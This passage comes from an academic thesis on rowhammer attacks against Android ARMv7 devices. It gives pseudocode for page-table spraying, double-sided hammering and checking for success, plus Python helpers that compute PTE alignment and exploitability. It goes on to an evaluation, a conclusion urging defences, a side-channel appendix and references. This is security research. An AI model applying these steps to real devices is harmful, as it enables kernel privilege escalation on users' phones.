The location of the PTE that points to p inside the target PT depends on the virtual address that maps the physical location of p. We must carefully select the VM address so that the PTE is aligned with the vulnerable word location. At the vulnerable page (victim page) found in Step 1, we aim to place our target PT. The PT contains the target PTE, placed at the vulnerable word (victim PTE), which points to p. Each PT maps 2MB of physical memory and fits in one PAGESIZE according to the structure explained in (6.3.2). As discussed earlier, the first 2048 bytes (512 words) contain the Linux software page table and the remaining 2048 bytes contain the physical Page Table (512 words) with 512 PTEs. Each PTE points to one physical page (4KB) of a contiguous virtual memory block of 512 pages, so 2MB of contiguous virtual memory is mapped to discontiguous physical pages. In preparation of the VA at which to map p, we divide the address for p (virt_source_address) into two parts: virt_source_address_base and virt_source_address_offset (Figure 57):
 virt_source_address_base: The base part of the VM address mapping p. Each different virt_source_address_base triggers a new PT.
 virt_source_address_offset: The offset part of the VM address mapping p. Each different virt_source_address_offset triggers a new PTE within the same PT. A specific offset in the VA guarantees that the respective PTE falls at the word_index_in_PT location in the physical PT part.

virt_source_address_offset = word_index_in_PT × PAGESIZE (bytes)


Figure 57 Format of Virtual Address for source page p

Any different value in the 12 most significant bits, designated virt_source_address_base, triggers a new valid target PT. On the other hand, a specific value in the 20 least significant bits, designated virt_source_address_offset, guarantees that the PTE is placed at the correct position in the target PT. To find the correct value, we need to calculate word_index_in_PT, the index of the vulnerable PTE in the vulnerable physical PT (Figure 58).
 word_index_in_PT: The PTE index in the vulnerable physical PT.
word_index_in_PT = word_index_in_page − 512

 word_index_in_page: The word index in the victim page.
word_index_in_page = byte_index_in_page / BYTES_PER_WORD

Figure 58 Format of the target Page Table at the vulnerable victim page
For the bit flip example studied so far, the corresponding values are the following:
 word_index_in_page = 577
 word_index_in_PT = 65
 virt_source_address_offset = 0x41000
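The same example flip yields these alignment values directly from the virtual address of the vulnerable byte:

```python
# Deriving the virtual-address offset that aligns the victim PTE, for the
# example flip at virt_address = 0x9051C906.

PAGESIZE       = 4096
BYTES_PER_WORD = 4

virt_address       = 0x9051C906
byte_index_in_page = virt_address & (PAGESIZE - 1)     # 0x906

word_index_in_page = byte_index_in_page // BYTES_PER_WORD
word_index_in_PT   = word_index_in_page - 512          # hardware half of the page
virt_source_address_offset = word_index_in_PT * PAGESIZE

print(word_index_in_page, word_index_in_PT, hex(virt_source_address_offset))
# 577 65 0x41000
```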

After gathering the necessary information about where to place the page p in physical memory, the specific M block, the specific page position inside M, and the VM address (virt_source_address) at which to map p, we are ready to spread as many target PTs as needed to exhaust all the S blocks available in physical memory, until one of them falls on the specific vulnerable location (phys_page). To do so, we map the physical page p into the VA space at the specific virt_source_address_offset every 2MB (mem_offset).
Step8
//Spreading target PT until one falls on M*
mem_offset ← 2MB
address_map ← virt_source_address_offset+mem_offset
fd ← ION_chunks_M2[source_pfn_row]
fd_offset ← source_page_index_in_row*PAGESIZE
length ← PAGESIZE
numPT ← 0
while exist S in order < 4 do
    mmap(address_map,length,fd,fd_offset)
    address_map ← address_map + mem_offset
    numPT++

//Padding the PT inside of the block M*
for i=0 to target_page_index_in_row
    mmap(address_map,length,fd,fd_offset)
    address_map ← address_map + mem_offset
    numPT++

The original Phys Feng Shui strategy is to spread non-valid PTs until one falls in the target M* block, then to pad the PTs inside M* by again spreading a specific number of non-valid PTs. When it is determined that the next PT will fall on the vulnerable location, the target PT is triggered by mapping the source page p at the correct VM address. In our case, we choose to let the parent process steer the last available S blocks with valid PTs and to pad with valid PTs too. This decision is based on the practical observation that the allocator does not behave in a completely predictable way when reserving the last available S blocks of orders lower than 4. Because of that, whatever we could hypothetically determine by checking the proc filesystem about when the allocation reaches the vulnerable region is, in practice, not enough of a guarantee. Our approach improves the chances of a successful massaging by increasing the number of valid Page Tables spread across physical memory.

 Step 9: Double-side Rowhammer the Target PT
Once we have selected and aligned the target PT at the vulnerable position, we perform the double-side rowhammer by accessing the pages above (virt_page_above) and below (virt_page_below) the target one (virt_page), replicating the bit flip found in the templating phase. The page above (virt_page_above) is located in the row above the vulnerable one, at position target_page_index_in_row; the above aggressor row is allocated in an M block accessible in the vector ION_chunks_M2 at position (target_pfn_row − 1). The page below (virt_page_below) is located in the row below the vulnerable one, at position target_page_index_in_row; the below aggressor row is allocated in an M block accessible in ION_chunks_M2 at position (target_pfn_row + 1). In order to reproduce the vulnerability, we set the pages above and below with the same pattern used in the templating phase (Figure 59).


Figure 59 Victim row and aggressor rows

Step9
//Double-side rowhammer the target PT
ION_chunks_M2[target_pfn_row-1] ← all 0s
ION_chunks_M2[target_pfn_row+1] ← all 0s
virt_page_above ← ION_chunks_M2[target_pfn_row-1]+target_page_index_in_row*PAGESIZE
virt_page_below ← ION_chunks_M2[target_pfn_row+1]+target_page_index_in_row*PAGESIZE
for I = 1 to 1000000
    *virt_page_above
    *virt_page_below

 Step 10: Check the Success of the Attack
If we succeed in reproducing the desired bit flip, we gain write access to our own page table, as it is now mapped into our address space. To verify whether the attack was successful, we had previously filled the physical page p with 1s. Since the same page p is mapped at every 2MB of VA up to the point where a valid target PT falls on the vulnerable location, we can read all the mapped VAs and check whether any of them no longer points to p.

Step10
//Check the success of the attack
mem_offset ← 2MB
address_map ← virt_source_address_offset+mem_offset
for I = 1 to numPT
    read(address_map)
    address_map ← address_map + mem_offset

6.4.4 Bit Flip Exploitability
The success of the attack relies on the ability to find exploitable bit flips in memory. The exploitability is determined by a combination of the number of bit flips found and the relative location of each flip inside L* during the templating phase. Note that so far we work with a single bit flip per page, to reduce the complexity of the exploitability analysis and implementation. A bit flip is exploitable if it flips one of the lower bits of the base-address part of a physical PTE in a PT. For the 1-to-0 flip direction, a page p can be shifted at most by the difference between the total number of pages of L* and the page index of the vulnerable page in L*. For the 0-to-1 flip direction, a page p can be shifted at most by the page index of the vulnerable page in L*. This restriction guarantees that, without any access to physical addresses, we can place the necessary source page p at a physical address that is 2^n pages apart from the target PT, where n is the flip-bit position in the base address. It also guarantees that the physical address belongs to the contiguous physical block L* and can be accessed through the M blocks under our control. By exploiting knowledge of the relative offsets inside the L* chunk, we can easily predict for each bit flip whether it can correspond to an exploitable position in the physical Page Table. Our ARMv7 Page Table layout (6.3.2) places the hardware PTEs in the second half of the page, so only flips in this part can be exploitable.
Condition 1: word_index_in_PT > 0
Once we know that the bit flip falls in the second half of the page, we check whether the flip falls in the base-address part of the PTE.
Condition 2: bit_index_in_word >= 12
Then we check whether the flip is placed at a low enough position in the base address. Note that in our implementation each L* block contains 64 rows (rows_on_L*=64).
Condition 3: (source_pfn_row > 0) AND (source_pfn_row < rows_on_L*)
Finally, we just need to make sure that the target and source pages do not fall in the same row. This is necessary because the whole target row needs to be available in memory so that it can be allocated with the target PT.
Condition 4: source_pfn_row != target_pfn_row
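The four conditions can be combined into a single predicate, sketched below. Note that we express the base-address check as bit_index_in_word >= 12, i.e. the flip must land in the base-address bits [31:12] of the PTE, which is what the worked example (a flip at bit 19 of the word) requires; the variable names follow the ones defined in this section.

```python
# Exploitability predicate over the flip information gathered during
# templating. ROWS_ON_L is the number of rows in one L* block (64 here).

ROWS_ON_L = 64

def is_exploitable(word_index_in_PT, bit_index_in_word,
                   source_pfn_row, target_pfn_row):
    if word_index_in_PT <= 0:                 # Condition 1: hardware PT half
        return False
    if bit_index_in_word < 12:                # Condition 2: base-address bits
        return False
    if not (0 < source_pfn_row < ROWS_ON_L):  # Condition 3: p stays inside L*
        return False
    if source_pfn_row == target_pfn_row:      # Condition 4: distinct rows
        return False
    return True

# The example flip (PTE index 65, word bit 19, source row 9, target row 1)
# is exploitable; a flip in a low flag bit of the PTE is not.
print(is_exploitable(65, 19, 9, 1))   # True
print(is_exploitable(65, 5, 9, 1))    # False
```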

6.4.5 Evaluation
Through the study of the practical implementation of our Android attack, based on the Phys Feng Shui technique, we conclude that the attack is not as clearly deterministic as it is described hypothetically. The principal reason is that the kernel memory allocator does not behave in a totally deterministic way, due to interference from other activities in the system during the massaging phase. We have observed that memory blocks smaller than 64KB are frequently locked at specific migration types, such as the Reclaimable, Movable and Reserve types. This sometimes causes the exhaustion of S blocks to fail, because the buddy allocator breaks the biggest blocks of size L instead of serving memory from the available locked S blocks. We overcome this massaging issue by implementing a try-and-abort logic: if the massaging step goes wrong, we simply abort the process and try again until a successful memory massaging is achieved, allowing the target Page Table to fall at the vulnerable template location. In addition, we improve the probability of success by increasing the number of valid target Page Tables spread, which increases the probability of one of them falling at the vulnerable location whenever the memory allocator behaves in an unexpected way. The exploitability of the templated vulnerability is closely related to the specific mapping that the Linux kernel makes from the software Page Table to the physical Page Table. In practice, this relation

depends on the kernel source, which makes the attack implementation not directly portable to systems with different versions. However, many of the ARMv7 architecture-based kernels for mobile devices use the same virtual mapping logic as the one explained in this study.


7 CONCLUSION

The Electronic Engineering community performs research on speed and voltage binning with a focus on system reliability. Binning products based on their characteristics requires testing each part to determine its highest stable clock frequency and the accompanying voltage and temperature while running. The tests aim to guarantee a specific percentage of reliability across groups of products in terms of performance ranges, optimizing maximum yields without random failures. Attacks such as rowhammer bring new concerns to the semiconductor manufacturing field. The reliability of the final product is related to the use of the IC inside the system: a malicious but legitimate input code can cause faulty behaviour in the DRAM IC. There is a need for research that addresses the performance testing of ICs, targeting reliability not only in terms of random failures but also in terms of intentional ones. Aspects such as the identification of critical areas for crosstalk on silicon, and the study of possible deterioration of critical paths by intentionally caused transistor degradation, have already been pointed out as crucial in [106]. Rowhammer attacks have managed to break every form of isolation (4.4): they break process boundaries to steal private information, break code integrity to gain root privileges, break the isolation between kernel and user on both x86 and ARM architectures, bypass the isolation between co-located customer VMs in the cloud, and even break the isolation that protects the hypervisor from VM guests. Therefore, due to rowhammer attacks, memory isolation in terms of the software division of zones inside the same memory resources can be considered critically vulnerable, and a detailed study is necessary of the possibilities of bypassing trust zones through the rowhammer vulnerability when they are based on shared RAM resources. Security solutions to defend systems against rowhammer attacks need to strike a balance between security and practicality.
Many of the countermeasures proposed to date incur unacceptable performance overhead or severely reduce the amount of available memory (sections 5.2 and 5.3). New attacks come out each year that bypass the existing defences, and new system features are exploiting the vulnerability in different ways. The threat is especially serious for smartphones and tablets because of the inability, with current technology, to replace the memory chip of such devices. Power consumption is a prime concern in the mobile world, which makes hardware solutions such as a higher DRAM refresh rate prohibitive in terms of increased consumption. New, effective and hard-to-bypass software solutions must be researched to reduce the exploitability of the vulnerability. From the analysis of the vulnerability on the ARM architecture and our implementation of the Android rowhammer attack, we can identify several research directions to be explored in the future. There is a need to study in more detail the role of the slab allocator in memory management, in order to implement a more deterministic Android attack in a real environment. A deeper understanding of the behaviour of each allocation hierarchy level could help explain the unexpected behaviour of the allocations in the massaging phase of the attack. Also, the development of a kernel module tool that dumps the physical allocations and the page table contents could help improve the probability of the attack on specific devices and achieve a better understanding of memory allocation in a real environment.


Our check for the rowhammer vulnerability on two LG Nexus 5 devices with identical HW and SW characteristics highlighted interesting results. We were not able to trigger the rowhammer vulnerability on the new LG Nexus 5 terminal, but we found plenty of bit flips on the old LG Nexus 5 device. The researchers in [60] show that the rowhammer vulnerability of a device under test increases over time. The fact that the number of bit flips increases with time could be related to memory degradation. We repeatedly performed double-side rowhammer on the same 4MB chunk of contiguous physical memory of the new LG Nexus 5 for days without obtaining any bit flip. It would be especially interesting to follow the above research lines to determine the reasons that provoke the increase of the vulnerability over time; our test shows that it may not be directly related to memory degradation through memory access. Future tests targeting the study of the vulnerability under battery degradation conditions could shed some light on the issue. Notice that understanding the reasons for the degradation over time will help to better understand the vulnerability mechanism and to characterize more precisely the physical phenomena involved.


8 APPENDIX 1: SIDE CHANNEL ATTACKS

Microarchitectural side-channel attacks exploit the operations performed by a computer architecture during software execution. Fundamentally, a computer architecture design aims at optimizing processing speed; thus, computer architects have designed machines where the processed data are strongly correlated with memory access and execution times. This data and code correlation acts as an exploitable side channel for microarchitectural SCAs. Since the cache is strongly related to execution/processing time, has high granularity and lacks any access restrictions, it constitutes an ideal focal point for microarchitectural SCAs. Microarchitectural attacks are impervious to access boundaries established at the software level, so they can bypass many application-layer software countermeasure tools and have proven effective even against restrictive execution environments like Virtual Machines (VMs) [73] or ARM TrustZone [107]. Cache side-channel attacks are a kind of side-channel attack that exploits the timing differences between cache hits and cache misses, and cache eviction has always been a means to perform them. There are three main techniques an attacker can use to determine which cache set is accessed by the victim. All of them work under the same logic: manipulate the cache into a known state, wait for victim activity, and examine what has changed:
 In the EVICT+TIME technique, the attacker evicts a known cache set and observes the changes in the execution time of the victim's operation [108].
 In PRIME+PROBE, the attacker fills the cache with a known state before the execution of the victim process and observes the changes in these cache states [108] [109]. When used on the last-level cache, it enables cross-core cache attacks.
 FLUSH+RELOAD exploits memory shared between attacker and victim and is very fine-grained.
The attacker flushes the memory shared between the malicious process and the victim process using the clflush instruction or cache eviction. After the victim process runs, the attacker measures the time needed to load the memory into a register in order to determine whether it has been accessed by the victim process [110] [111]. Furthermore, variations of the FLUSH+RELOAD attack have been proposed for ARM-based systems, thus providing strong indications of cache SCA vulnerabilities in ARM embedded systems (including embedded system nodes, Android-based mobile devices and ARM TrustZone enabled processors) [107] [112]. In [107], a cache storage side-channel technique based on unexpected cache hits caused by cache incoherence is introduced.


9 ACKNOWLEDGEMENTS

First of all, I would like to thank Prof. Odysseas Koufopavlou for giving me the opportunity to work academically in the hardware security field and for allowing me the freedom to study it in depth. I would also like to thank Dr Apostolos Fournaris for his assistance, valuable contributions and coordination of my efforts through sharing his expertise in the hardware security field. Additionally, I would like to thank Mr Victor van der Veen of the VUSEC group at VU Amsterdam, the Netherlands, for helping me overcome issues regarding the DRAMMER implementation. Finally, I would like to thank Dimitris Deyannis from FORTH in Greece for his contribution to my research regarding the Linux kernel and cross-compiling.



10 BIBLIOGRAPHY

[1] Y. Kim, R. Daly, J. Kim, C. Fallin, J. H. Lee, D. Lee, C. Wilkerson, K. Lai and O. Mutlu, “Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors,” IEEE, 2014.

[2] V. van der Veen, Y. Fratantonio, M. Lindorfer, D. Gruss, C. Maurice, G. Vigna, H. Bos, K. Razavi and C. Giuffrida, “Drammer: Deterministic Rowhammer Attacks on Mobile Platforms,” in Proceedings of the 23rd ACM SIGSAC Conference on Computer and Communications Security (CCS), Vienna, Austria, 2016.

[3] D. Gruss, C. Maurice and S. Mangard, “Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript,” DIMVA, 2016.

[4] D. Kim, V. Chandra, R. Aitken and D. Blaauw, “Variation-Aware Static and Dynamic Writability Analysis for Voltage-Scaled Bit-Interleaved 8-T SRAMs”.

[5] Q. Chen, H. Mahmoodi, S. Bhunia and K. Roy, “Modeling and Testing of SRAM for New Failure Mechanisms due to Process,” West Lafayette, IN, USA.

[6] S. Yoshimoto, M. Terada, S. Okumura, T. Suzuki, S. Miyano and H. Kawaguchi, “A 40-nm 0.5-V 12.9-pJ/Access 8T SRAM Using Low-Energy,” IEICE Trans. Electron., 2012.

[7] ATP, “ATP: Understanding RAM and DRAM Computer Memory Types,” [Online]. Available: http://www.atpinc.com/Memory-insider/computer-memory-types-dram-ram-module. [Accessed 14 10 2018].

[8] J. Romo, “DDR Memories Comparison and Overview,” in Beyond Bits, p. 70.

[9] Y. Asakura, “DDR Memory Trends and Design Considerations,” DRAM Solution Group, Micron Technology, Inc, 2012.

[10] I. S. NEWS, “The DRAM Story with articles by Dennard, Itoh, Koyanagi, Sunami, Foss and Isaac,” SSCS IEEE SOLID-STATE CIRCUITS SOCIETY NEWS, vol. 13, no. 1, 2008.

[11] O. Mutlu and Y. Kim, “Computer Architecture,” in Lecture 25: Main Memory, Carnegie Mellon University.

[12] G. Rajinder, “Everything You Always Wanted to Know About SDRAM (Memory): But Were Afraid to Ask,” 2010. [Online]. Available: https://www.anandtech.com/show/3851/everything-you-always-wanted-to-know-about-sdram-memory-but-were-afraid-to-ask/2.

[13] I. Singh Bhati, “Scalable and Energy Efficient DRAM Refresh Techniques,” Department of Electrical and Computer Engineering. University of Maryland, College Park.


[14] I. Bhati , M.-T. Chang, Z. Chishti , S.-L. Lu and B. Jacob, “DRAM Refresh Mechanisms, Penalties, and Trade-Offs,” in IEEE Transactions on computers Vol. 64, 2015.

[15] K. Chang, D. Lee, Z. Chishti, A. Alameldeen, C. Wilkerson, Y. Kim and O. Mutlu, “Improving DRAM Performance by Parallelizing Refreshes with Accesses,” Carnegie Mellon University, Intel Labs, 2017.

[16] P. Chia, “New DRAM HCI Qualification Method Emphasizing on Repeated Memory Access,” Integrity Reliability Workshop, 2010.

[17] D. Kaseridis, J. Stuecheli and L. K. John, “Minimalist open-page: A DRAM page-mode scheduling policy for the many-core era,” in International Symposium on Microarchitecture (MICRO), 2011.

[18] O. D. Kahn and J. R. Wilcox, “Method for dynamically adjusting a memory page closing policy”. Patent 6799241, 28 September 2004.

[19] H. David, C. Fallin, E. Gorbatov, U. R. Hanebutte and O. Mutlu, “Memory power management via dynamic voltage/frequency scaling,” in ACM International Conference on Autonomic Computing, 2011.

[20] J. L. Hennessy and D. A. Patterson, Computer Architecture: A Quantitative Approach, San Francisco: Elsevier, 2007.

[21] H. Wong, “Intel Ivy Bridge Cache Replacement Policy,” [Online]. Available: http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/. [Accessed 18 11 2018].

[22] C. Maurice, N. Le Scouarnec, C. Neumann, O. Heen and A. Francillon, “Reverse engineering intel last-level cache complex addressing using performance counters,” in Research in Attacks, Intrusions, and Defenses - 18th International Symposium, RAID 2015, Kyoto, Japan, 2015.

[23] G. Irazoqui, T. Eisenbarth and B. Sunar, “Systematic reverse engineering of cache slice selection in intel processors.,” in Euromicro Conference on Digital System Design, DSD 2015, Madeira, Portugal, 2015.

[24] M. Koglin, “Memory Subsystem in the Linux Kernel,” University of Hamburg, 2015.

[25] D. P. Bovet and M. Cesati, “Understanding the Linux Kernel, 3rd Edition,” 2005.

[26] J. Corbet, A. Rubini and G. Kroah-Hartman, “Chapter 15: Memory Mapping and DMA,” in Linux Device Drivers, 3rd Edition, 2006.

[27] Free Electrons, “Linux Kernel and Driver Development Training,” 9 February 2019. [Online]. Available: https://bootlin.com/doc/training/linux-kernel/linux-kernel-slides.pdf. [Accessed 9 February 2019].

[28] R. Prodduturi, Effective Handling of Low Memory Scenarios in Android, Bombay: Department of Computer Science and Engineering, Indian Institute of Technology.


[29] A. k. Björn Brömstrup, Memory Subsystem and Data types in the Linux Kernel, University of Hamburg, 2015.

[30] D. P. Bovet and M. Cesati, Understanding the Linux Kernel, O'Reilly, 2000.

[31] “Memory Management and Virtual Memory,” [Online]. Available: https://slideplayer.com/slide/13277282/. [Accessed 9 2 2019].

[32] M. Porter, “Virtual memory and Linux,” in Embedded Linux Conference Europe, 13 October 2016.

[33] M. Redeker, B. Cockburn and D. Elliot, “An investigation into cross-talk noise in DRAM structures,” IEEE Int. Workshop Memory Tech., pp. 123-129, 2002.

[34] D. Min and D. Langer, “Multiple twisted dataline technique for multigigabit DRAMs,” IEEE J. Solid-State Circuits, vol. 34, no. 6, pp. 856-865, 1999.

[35] D.-H. Kim, P. J. Nair and M. K. Qureshi, “Architecture Support for Mitigating Row Hammering in DRAM Memories,” IEEE Computer Architecture Letters, vol. 14, no. 1, January-June 2015.

[36] M. Yoo, K. Choi and W. Sun, “Saddle-fin cell transistors with oxide etch rate control by using tilted ion implantation (TIS-Fin) for sub-50-nm DRAMs,” J. Korean Phys. Soc, vol. 56, no. 2, pp. 643-647, 2010.

[37] P. Pessl, D. Gruss, C. Maurice, M. Schwarz and S. Mangard, “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks,” 25th USENIX Security Symposium, 2016.

[38] M. Qureshi, D.-H. Kim, S. Khan, P. Nair and O. Mutlu, “AVATAR: A Variable-Retention-Time (VRT) Aware Refresh for DRAM Systems,” Proceedings of the IEEE/IFIP International Conference on Dependable Systems and Networks (DSN).

[39] R. Niccolas A., Scholarly Horizons: University of Minnesota, Morris Undergraduate Journal, vol. 3, no. 1, 2016.

[40] Y. Taur and T. H. Ning, “Fundamentals of Modern VLSI Devices,” Cambridge Univ. Press, 2009.

[41] M. Lanteigne, “How Rowhammer Could Be Used to Exploit Weakness in Computer Hardware,” 2016. [Online]. Available: https://www.thirdio.com/rowhammer.pdf . [Accessed 1 April 2017].

[42] K. Razavi, B. Gras, E. Bosman, B. Preneel, C. Giuffrida and H. Bos, “Flip Feng Shui: Hammering a Needle in the Software Stack,” in Proceedings of the 25th USENIX Security Symposium, Austin, TX, USA, 10–12 August 2016.

[43] D. Gruss, M. Lipp, M. Schwarz, D. Genkin, J. Juffinger, S. O'Connell, W. Schoechl and Y. Yarom, “Another Flip in the Wall of Rowhammer Defenses,” in 39th IEEE Symposium on Security and Privacy 2018, 2018.

[44] X. Lou, Z. Zhang, Z. Liang and Y. Zhou, “Understanding Rowhammer Attacks through the Lens of a Unified Reference Framework,” arXiv:1901.03538v1, 2019.


[45] M. Seaborn and T. Dullien, “Exploiting the DRAM rowhammer bug to gain kernel privileges,” in Proceedings of 2016 ACM SIGSAC Conference, Vienna, Austria, 2016.

[46] E. Bosman, K. Razavi, H. Bos and C. Giuffrida, “Dedup Est Machina: Memory Deduplication as an Advanced Exploitation Vector,” in IEEE Symposium on Security and Privacy, San Jose, CA, USA, 23-25 May 2016.

[47] R. Qiao and M. Seaborn, “A new approach for rowhammer attacks,” in 2016 IEEE International Symposium on Hardware Oriented Security and Trust (HOST), McLean, VA, USA, May 2016.

[48] P. Pessl, D. Gruss, C. Maurice, M. Schwarz and S. Mangard, “Reverse Engineering Intel DRAM Addressing and Exploitation,” Graz University of Technology, Austria, 27 November 2015.

[49] Z. Aweke, S. Yitbarek, R. Qiao, R. Das, M. Hicks, Y. Oren and T. Austin, “ANVIL: Software-based protection against next-generation rowhammer attacks,” in 21st ACM International Conference on Architectural Support for Programming Languages and Operating Systems (ASPLOS), Atlanta, GA, USA, 2016.

[50] O. Mutlu, “The Rowhammer Problem and Other Issues We Face as Memory Becomes Denser”.

[51] B. Aichinger, “DDR memory errors caused by Row Hammer,” HPEC'15, 2015.

[52] M. Lanteigne, “How Rowhammer Could Be Used to Exploit Weaknesses in Computer Hardware,” Third I/O Incorporated, March 2016.

[53] M. T. Aga, Z. B. Aweke and T. Austin, “When good protections go bad: Exploiting anti-DoS measures to accelerate rowhammer attacks,” in Hardware Oriented Security and Trust (HOST), 2017 IEEE International Symposium, 2017.

[54] S. Bhattacharya and D. Mukhopadhyay, “Curious Case of Rowhammer: Flipping Secret Exponent Bits using Timing Analysis,” Indian Institute of Technology, Kharagpur, India.

[55] Y. Xiao, X. Zhang, Y. Zhang and R. Teodorescu, “One Bit Flips, One Cloud Flops: Cross-VM Row Hammer Attacks and Privilege Escalation,” in Proceedings of the 25th USENIX Security Symposium, Austin, 2016.

[56] Y. Jang, J. Lee, S. Lee, and T. Kim, “SGX-Bomb: Locking Down the Processor via Rowhammer Attack” in Proceedings of the 2nd Workshop on System Software for Trusted Execution, 2017.

[57] P. Frigo, “Practical Microarchitectural Attacks from Integrated GPUs,” 2017.

[58] P. Frigo, C. Giuffrida, H. Bos and K. Razavi, “Grand Pwning Unit: Accelerating Microarchitectural Attacks with the GPU,” 2018.

[59] A. Tatar, R. Krishnan Konoth, E. Athanasopoulos, C. Giuffrida, H. Bos and K. Razavi, “Throwhammer: Rowhammer Attacks over the Network and Defenses,” 2018.

[60] V. van der Veen, M. Lindorfer, Y. Fratantonio, H. Padmanabha Pillai, G. Vigna, C. Kruegel, H. Bos and K. Razavi, “GuardION: Practical Mitigation of DMA-based Rowhammer Attacks on ARM,” Lecture Notes in Computer Science (including subseries Lecture Notes in Artificial Intelligence and Lecture Notes in Bioinformatics), vol. 10885, 2018.

[61] F. Zhang, X. Lou, X. Zhao, S. Bhasin, W. He, R. Ding, S. Qureshi and K. Ren, “Persistent fault analysis on block ciphers,” IACR Transactions on Cryptographic Hardware and Embedded Systems, pp. 150-172, 2018.

[62] M. Lipp, M. T. Aga, M. Schwarz, D. Gruss, C. Maurice, L. Raab, “Nethammer: Inducing rowhammer faults through network requests,” arXiv preprint arXiv:1805.04956 , 2018.

[63] Y. Cheng, S. Nepal, Z. Zhang and Z. Wang, “Still Hammerable and Exploitable: on the Effectiveness of Software-only Physical Kernel Isolation,” arXiv, 2018.

[64] D. Gruss, C. Maurice, A. Fogh, M. Lipp and S. Mangard, “Prefetch Side-Channel Attacks: Bypassing SMAP and Kernel ASLR,” in CCS, 2016.

[65] L. Liu, “A software Memory Partition Approach for eliminating Bank-level Interference in multicore systems,” PACT, 2012.

[66] N. Suzuki, “Coordinated Bank and Cache Coloring for Temporal Protection of Memory Accesses,” ICESS, 2013.

[67] M. Salyzyn, “UPSTREAM: pagemap: do not leak physical addresses to non-privileged userspace,” 2015. [Online]. Available: https://android-review.googlesource.com/#/c/kernel/common/+/182766. [Accessed 25 01 2019].

[68] Kernel.org. [Online]. Available: https://www.kernel.org/doc/Documentation/vm/pagemap.txt.

[69] C. Maurice, N. Le Scouarnec, C. Neumann, O. Heen and A. Francillon, “Reverse Engineering Intel Last-Level Cache Complex Addressing Using Performance Counters,” Proceedings of the 18th International Symposium on Research in Attacks, Intrusions and Defenses (RAID'15), 2015.

[70] M. Seaborn, “How physical addresses map to rows and banks in DRAM,” May 2015. [Online]. Available: http://lackingrhoticity.blogspot.com/2015/05/how-physical-addresses-map-to-rows-and-banks.html. [Accessed 21 10 2018].

[71] M. Seaborn and T. Dullien, “http://googleprojectzero.blogspot.com/2015/03/exploiting-dram- rowhammer-bug-to-gain.html,” March 2015. [Online].

[72] Google, “ https://github.com/google/rowhammer-test,” [Online].

[73] G. Irazoqui, T. Eisenbarth and B. Sunar, “Cross processor cache attacks,” in Proceedings of the 2016 ACM Asia Conference Computer Communications Security, Xi’an, China, 30 May–3 June 2016.

[74] R. Owens and W. Wang, “Non-interactive OS fingerprinting through memory-deduplication technique in virtual machines,” IPCCC, 2011.

[75] A. Barresi, K. Razavi, M. Payer and T. R. Gross, “CAIN: Silently breaking ASLR in the cloud,” WOOT, 2015.


[76] Linux, “Video4Linux,” 2014. [Online]. Available: https://en.wikipedia.org/wiki/Video4Linux.

[77] M.-C. Hsueh, T. K. Tsai and R. K. Iyer, “Fault Injection Techniques and Tools,” University of Illinois at Urbana-Champaign.

[78] P. Frigo, “Practical Microarchitectural Attacks from Integrated GPUs,” 18 12 2018. [Online]. Available: https://repository.tudelft.nl/islandora/object/uuid%3Ac0d3c629-4c67-4741-9776-05802d89872f. [Accessed 1 10 2019].

[79] D. Litzenberger, “PyCrypto - The Python Cryptography Toolkit,” [Online]. Available: https://www.dlitz.net/software/pycrypto/. [Accessed 27 12 2018].

[80] D. K. Gillmor, “pem2openpgp - translate PEM-encoded RSA key to OpenPGP certificates,” [Online].

[81] Apple Inc., “Mac EFI security update 2015-001,” 2015.

[82] Hewlett-Packard, “Moonshot Component Pack Version,” 2015.

[83] Lenovo, “Row hammer Privilege Escalation,” 2015.

[84] M. Ghasempour, M. Lujan and J. Garside, “ARMOR: A run-time memory Hot-Row detector,” 2015. [Online]. Available: http://apt.cs.manchester.ac.uk/projects/ARMOR/RowHammer/armor.html. [Accessed 9 February 2019].

[85] G. Irazoqui, T. Eisenbarth and B. Sunar, “MASCAT: Stopping microarchitectural attacks before execution,” Cryptology ePrint Archive, 2017.

[86] N. Herath and A. Fogh, “These are Not Your Grand Daddy's CPU Performance Counters - CPU Hardware Performance Counters for Security,” Black Hat Briefings (DAC), 2015.

[87] D. Gruss, C. Maurice, K. Wagner and S. Mangard, “Flush+Flush: A Fast and Stealthy Cache Attack,” DIMVA, 2016.

[88] E. Chiappetta, E. Savas and C. Yilmaz, “Real time detection of cache-based side-channel attacks using hardware performance counters,” Cryptology ePrint Archive, 2015.

[89] J. Corbet, “Defending against Rowhammer in the kernel,” October 2016.

[90] S. Vig, S.-K. Lam, S. Bhattacharya and D. Mukhopadhyay, “Rapid detection of rowhammer attacks using dynamic skewed hash tree,” Proceedings of the 7th International Workshop on Hardware and Architectural Support for Security and Privacy, p. 7, 2018.

[91] F. F. Brasser, L. Davi, D. Gens, C. Liebchen and A.-R. Sadeghi, “Can't touch this: Practical and generic software-only defenses against rowhammer attacks,” CoRR, 2016.

[92] “ZebRAM: Comprehensive and compatible software protection against Rowhammer,” in 13th USENIX Symposium on Operating Systems Design and Implementation (OSDI 2018), Carlsbad, CA, 2018.


[93] ARM Limited, ARM Architecture Reference Manual, ARMv7-A and ARMv7-R edition, 2014.

[94] “Embedded Linux Wiki,” [Online]. Available: https://elinux.org/Tims_Notes_on_ARM_memory_allocation.

[95] R. Pi. [Online]. Available: https://www.raspberrypi.org/.

[96] BeagleBoard. [Online]. Available: https://beagleboard.org/.

[97] R. Pi. [Online]. Available: https://github.com/raspberrypi/linux/blob/rpi-4.19.y/arch/arm/mm/cache-v7.S. [Accessed 20 3 2019].

[98] Texas Instruments, “CMEM detailed description,” [Online]. Available: http://software-dl.ti.com/dsps/dsps_public_sw/sdo_sb/targetcontent/linuxutils/latest_2_x/docs/html/cmem_8h.html. [Accessed 17 3 2019].

[99] VUSec Group, “https://www.vusec.net/,” [Online].

[100] VUSec, “GitHub,” 2017. [Online]. Available: https://github.com/vusec/drammer. [Accessed 14 3 2019].

[101] R. K. , 17 November 2005. [Online]. Available: https://www.kernel.org/doc/Documentation/arm/memory.txt.

[102] LWN.net, “The Android ION memory allocator,” [Online]. Available: https://lwn.net/Articles/480055/ .

[103] Google, “android-msm-hammerhead-3.4-kitkat-mr2 kernel sources,” [Online]. Available: https://android.googlesource.com/kernel/msm/+/android-msm-hammerhead-3.4-kitkat-mr2.

[104] ARM Limited, ARM Architecture Reference Manual, ARMv8 and ARMv8-A architecture profile, 2013.

